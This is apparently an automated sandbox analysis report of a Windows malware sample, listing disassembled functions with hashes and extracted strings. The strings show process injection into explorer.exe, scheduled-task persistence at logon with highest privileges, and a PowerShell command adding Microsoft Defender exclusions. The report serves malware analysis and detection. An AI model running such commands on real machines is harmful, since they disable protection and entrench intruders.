                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyEnvironmentQueue::StructuredVariableWork$Heap$FreeInternetOpenProcess
                                                                • String ID: API_DOMAIN$STUB_ID$USER_ID$[+] Architectures are compatible !$[+] Source PE Image architecture : x64$[+] Source PE Image architecture : x86$[+] Subsystems are compatible.$[+] The source image doesn't have a relocation table.$[+] The source image has a relocation table.$[-] Architectures are not compatible !$[-] Subsystems are not compatible.$h
                                                                • API String ID: 1079869202-2761788501
                                                                • Opcode ID: f0a28c6f6caee5bf179066c4ea5aae334b918bd6cd777b5322d76b7e630e95d1
                                                                • Instruction ID: 49d5c69c8beeb9cb468ddc09fc5a66549010384ccbed5f63dd83384be8f7f5dc
                                                                • Opcode Fuzzy Hash: f0a28c6f6caee5bf179066c4ea5aae334b918bd6cd777b5322d76b7e630e95d1
                                                                • Instruction Fuzzy Hash: 5502BD2191E98295E6A1EB50E4553FEA364FBD6B44F800032E74DC29EEEF6CDD45CB10
                                                                Function 00007FF6A54A5890 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$TEMP$WinDrive-
                                                                • API String ID: 4146042529-4173729995
                                                                • Opcode ID: f5865e50251ff66e4b77a13309c33e6298c35229958b2e70ef48ad9d37ecc98f
                                                                • Instruction ID: 7f88a1991839491ecad2c3704bb86fac2eee3ec87003ca2f9f43cc42e567171b
                                                                • Opcode Fuzzy Hash: f5865e50251ff66e4b77a13309c33e6298c35229958b2e70ef48ad9d37ecc98f
                                                                • Instruction Fuzzy Hash: 78C13E2251EAC185EB60DB21E4543EBA7A0FBD6B54F504132E78D83A99DF3CD948CB00
                                                                Function 00007FF6A54A5D40 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$C:\Windows\System32\System-
                                                                • API String ID: 4146042529-412652669
                                                                • Opcode ID: fee63bd17ce6ab8909c1affe04eff74c1a45373d840b99b4310dc446d36d5fc4
                                                                • Instruction ID: 19171427747f47325cbc336fe8694e537a2b42e6d96dd4bf5adb830aae074ea4
                                                                • Opcode Fuzzy Hash: fee63bd17ce6ab8909c1affe04eff74c1a45373d840b99b4310dc446d36d5fc4
                                                                • Instruction Fuzzy Hash: 32A1493251EAC185E760DB25E4547ABB7A0FB86B94F404136E78D83AE9DF7DD848CB00
                                                                Function 00007FF6A54A3840 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyHeapQueue::StructuredWork$FreeInternetOpenProcess
                                                                • String ID: C:\Windows\SysWOW64\explorer.exe$R.txt$STB/$[-] The injection has failed !$h
                                                                • API String ID: 2325589043-1079897378
                                                                • Opcode ID: 9cb5b3d5eb1d18f403b42b0107509711b86451ca5b612f2a05636c401d8507d9
                                                                • Instruction ID: c4f8cc6fc1fab8a82d546631bbb5dad6db73498409067027dfe2e13828f5c1ed
                                                                • Opcode Fuzzy Hash: 9cb5b3d5eb1d18f403b42b0107509711b86451ca5b612f2a05636c401d8507d9
                                                                • Instruction Fuzzy Hash: 57712131A1E98285E660EB51F4553FAA364FFD6B44F404132E78EC2AA9EF7CD945CB00
                                                                Function 00007FF6A54A75A0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID: " /SC ONLOGON /RL HIGHEST /F$" /TR "$.exe$C:\Windows\System32\System-$SCHTASKS /CREATE /TN "$System-$h
                                                                • API String ID: 4139908857-642182117
                                                                • Opcode ID: db5e7c601a60bbd6657f81db4a692b63939a3ac431415b2b08baacfff3b41def
                                                                • Instruction ID: 8f3256c72cb8742790725c542bbd17122cdb7fb5c172bd4947848f315870d353
                                                                • Opcode Fuzzy Hash: db5e7c601a60bbd6657f81db4a692b63939a3ac431415b2b08baacfff3b41def
                                                                • Instruction Fuzzy Hash: 9B81247561DAC190EA60EB11E4553EF7761FBD5B44F804132D68D876AADF3CD908CB40
                                                                Function 00007FF6A54A6D20 Relevance: 21.1, APIs: 14, Instructions: 92networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CleanupStartupgetaddrinfo
                                                                • String ID:
                                                                • API String ID: 2905774039-0
                                                                • Opcode ID: 00b410a564e447a5e703a10041dea125bc3784f4661cb3438349098ce39b1df0
                                                                • Instruction ID: 8aff8a071d53fa2ca80c8e4a8c6ad7674c86518bf5ac816b4edf45f19f15e46c
                                                                • Opcode Fuzzy Hash: 00b410a564e447a5e703a10041dea125bc3784f4661cb3438349098ce39b1df0
                                                                • Instruction Fuzzy Hash: 26413336929A8186EB60DF11E44426E7BA4FBCAF95F400232DA8D837A5CF3CD945CF00
                                                                Function 00007FF6A54A8200 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 75processsynchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", xrefs: 00007FF6A54A8219
                                                                • h, xrefs: 00007FF6A54A8251
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Handle$CloseProcess$CodeConcurrency::details::CreateEmptyExitObjectQueue::SingleStructuredWaitWork
                                                                • String ID: h$powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
                                                                • API String ID: 4115279282-4234767237
                                                                • Opcode ID: 3c7e2cb46ad5d5e1d85a916f25e909d9c0e799274d56eb1300c390c160631d89
                                                                • Instruction ID: 9cb569f26db5f20688035069ba3b855810495344134a95412503d3fb673a6314
                                                                • Opcode Fuzzy Hash: 3c7e2cb46ad5d5e1d85a916f25e909d9c0e799274d56eb1300c390c160631d89
                                                                • Instruction Fuzzy Hash: 3031463562DA8185E760DB60E8543AF7360FBC6B55F404136E68E836E9DF7CD905CB00
                                                                Function 00007FF6A54A7300 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 127networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Internet$Open$CloseConcurrency::details::EmptyHandleQueue::StructuredWork
                                                                • String ID: ://$URL Checker
                                                                • API String ID: 556659790-376189231
                                                                • Opcode ID: 138a4f9c99596b6add8abca3ad47d818ff894f3662f0bfd93382009f04946c07
                                                                • Instruction ID: 72324875953b4f7d3dfdf4c098d251182ecde5497ba0551fe3c924085953faf9
                                                                • Opcode Fuzzy Hash: 138a4f9c99596b6add8abca3ad47d818ff894f3662f0bfd93382009f04946c07
                                                                • Instruction Fuzzy Hash: 6D61462151D98285EBA0DB11E4507AFBB60EBC2B54F401132F79E879EADF7CD945CB10
                                                                Function 00007FF6A54A2770 Relevance: 18.1, APIs: 12, Instructions: 68fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateSize
                                                                • String ID:
                                                                • API String ID: 4148174661-0
                                                                • Opcode ID: 4fc6a91cce659f982cfa41dcbe280a0f34ebc84f7802506850a2c790e99faa42
                                                                • Instruction ID: fcf5944952b0cde4ff5463412d21f657b461c7f3c603927a4f83075effd7734e
                                                                • Opcode Fuzzy Hash: 4fc6a91cce659f982cfa41dcbe280a0f34ebc84f7802506850a2c790e99faa42
                                                                • Instruction Fuzzy Hash: 56310D3591DA4286D750DB25F85832AB770FBCABA5F500235EB9E82AE4CF7DD845CB00
                                                                Function 00007FF6A54E7F28 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 407COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID: 0$0$0
                                                                • API String ID: 3215553584-3137946472
                                                                • Opcode ID: 78a9105b8d3eb675c28d1e7f2810b931d6c0b8dfaf285acd41b3411de57611db
                                                                • Instruction ID: 66fe58932ceae22e9f5fd8b0f77f5f26a0fdf32f37b8e75d6defcf13a1d4ec6d
                                                                • Opcode Fuzzy Hash: 78a9105b8d3eb675c28d1e7f2810b931d6c0b8dfaf285acd41b3411de57611db
                                                                • Instruction Fuzzy Hash: 60E1823290BA8699FB61CF2495942FD7B95DB53F84F548032CF8887796CE3EAC599300
                                                                Function 00007FF6A54AD430 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                • String ID: bad locale name
                                                                • API String ID: 3904239083-1405518554
                                                                • Opcode ID: 4dfde3383f7a4b369a959d9e2bd725c371989b896de6c47dd7e2a432758ade5a
                                                                • Instruction ID: d325ba540f7f8f237aa9b51cf4b1348576ecf1d49d1a2b075a9085b7bd9af45b
                                                                • Opcode Fuzzy Hash: 4dfde3383f7a4b369a959d9e2bd725c371989b896de6c47dd7e2a432758ade5a
                                                                • Instruction Fuzzy Hash: EF113C61E2FA4641DD84E72AE48567E6350EF87FC4F402035FA8E8B76BDE2CD8114744
                                                                Function 00007FF6A54A8390 Relevance: 15.1, APIs: 10, Instructions: 102COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                • String ID:
                                                                • API String ID: 215268677-0
                                                                • Opcode ID: 5f2c0832ab6ece885dcda59b9d817a8b030af4e96d30603e9d99abf3769486a9
                                                                • Instruction ID: 551412b7019ee9f947025333a0656bceaee752b97bb52e700e7a55baf193a991
                                                                • Opcode Fuzzy Hash: 5f2c0832ab6ece885dcda59b9d817a8b030af4e96d30603e9d99abf3769486a9
                                                                • Instruction Fuzzy Hash: E451093261D78196E760CB25E46436FBBA0FB86B44F504135DA8D87AA9DF3CE849CF40
                                                                Function 00007FF6A54BEDB0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 57COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                • :AM:am:PM:pm, xrefs: 00007FF6A54BEE66
                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF6A54BEE1A
                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF6A54BEE56
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Maklocwcsstd::_$Yarn
                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                • API String ID: 1194159078-3743323925
                                                                • Opcode ID: 5d4962b39fd07b777b164d7b9a713fa1bee80c8d123ce2088ff48aaf3eafe067
                                                                • Instruction ID: 4dde113ea00367c4eb6d4372bcc12a677072938473d2540617b5600fc5f1b8cc
                                                                • Opcode Fuzzy Hash: 5d4962b39fd07b777b164d7b9a713fa1bee80c8d123ce2088ff48aaf3eafe067
                                                                • Instruction Fuzzy Hash: A4215122A0AB4686EA10EB25E4413BD73B0EB96F84F498135EB4D83756DF3CF895C740
                                                                Function 00007FF6A54DFF70 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 849930591-393685449
                                                                • Opcode ID: 5d6ddb46fddb62dcb6d5fccab5f44789c93ad0723b7c46ba309f4a08e2c6cabf
                                                                • Instruction ID: 45682bfe979ce3fcb2ad7df6b98e6829488a9de49f963794f051902fdbbe5268
                                                                • Opcode Fuzzy Hash: 5d6ddb46fddb62dcb6d5fccab5f44789c93ad0723b7c46ba309f4a08e2c6cabf
                                                                • Instruction Fuzzy Hash: 0FD15E32A097428AEB60DF6594403ED7BA0FB57B98F100135EE9D97B96DF38E991C700
                                                                Function 00007FF6A54A1AEB Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 144sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CloseHandleSleep$InternetOpentype_info::_name_internal_method
                                                                • String ID: M.txt$STB/
                                                                • API String ID: 15892541-1241599132
                                                                • Opcode ID: 76b51afb5aff4670bf812edd21bf24bcb82751ba93fb30ada2d883f34a336eb3
                                                                • Instruction ID: 37b3c5b97edde50ebbc7651e1d2e25cb35a76095b07038fea3a66a9f755ea572
                                                                • Opcode Fuzzy Hash: 76b51afb5aff4670bf812edd21bf24bcb82751ba93fb30ada2d883f34a336eb3
                                                                • Instruction Fuzzy Hash: A9711271A2E9C291EA61EB10E4512FEA365FFD6B40F801132E68EC79DADF2CD915C740
                                                                Function 00007FF6A54F2C44 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID: f$p$p
                                                                • API String ID: 3215553584-1995029353
                                                                • Opcode ID: 0534396f76681fee6182308b4ef0558f8f0e6eb64ce6bcf6c9c2df8dad8d6b35
                                                                • Instruction ID: a511786cf14875b05a2d03c7b24368be62f88f92fe704fbc6ba2733439b4013d
                                                                • Opcode Fuzzy Hash: 0534396f76681fee6182308b4ef0558f8f0e6eb64ce6bcf6c9c2df8dad8d6b35
                                                                • Instruction Fuzzy Hash: 1E129162A0E14386FB28DA1DF5542BD7691FF42F54F944136EA89876C8DF3CED888B10
                                                                Function 00007FF6A54F9FE8 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 3215553584-0
                                                                • Opcode ID: d65238d448fa04aa48ed10b74e8a9bd00d4b95505370c997ac1359f5591ceb68
                                                                • Instruction ID: 64ab0aefe5de1ac6c6737119da277221bb1f2ec2391963653a64355049a7a6f2
                                                                • Opcode Fuzzy Hash: d65238d448fa04aa48ed10b74e8a9bd00d4b95505370c997ac1359f5591ceb68
                                                                • Instruction Fuzzy Hash: 82C10322A0E78685E764CB5A90442BE3B91FF83F94F564131EA4E83791DF7DEC898301
                                                                Function 00007FF6A54A1644 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 177COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: CallCheckConnectionFunction0InternetMember
                                                                • String ID: #$M.txt$STB/$Waiting for Internet connection...
                                                                • API String ID: 917332565-3301742459
                                                                • Opcode ID: a529bee728ea5cab3a462fb131cfc8418009870eb95399fe24118a950620aa37
                                                                • Instruction ID: 2fe6a3c0ee9860ffbe1886f0cc0ecfa79d9258c6beebecf475187eeff8346085
                                                                • Opcode Fuzzy Hash: a529bee728ea5cab3a462fb131cfc8418009870eb95399fe24118a950620aa37
                                                                • Instruction Fuzzy Hash: E991006191E98291EA60EB15E4913FEA364FF96B44F801032E78DC79DAEF2CD905CB50
                                                                Function 00007FF6A54E289C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
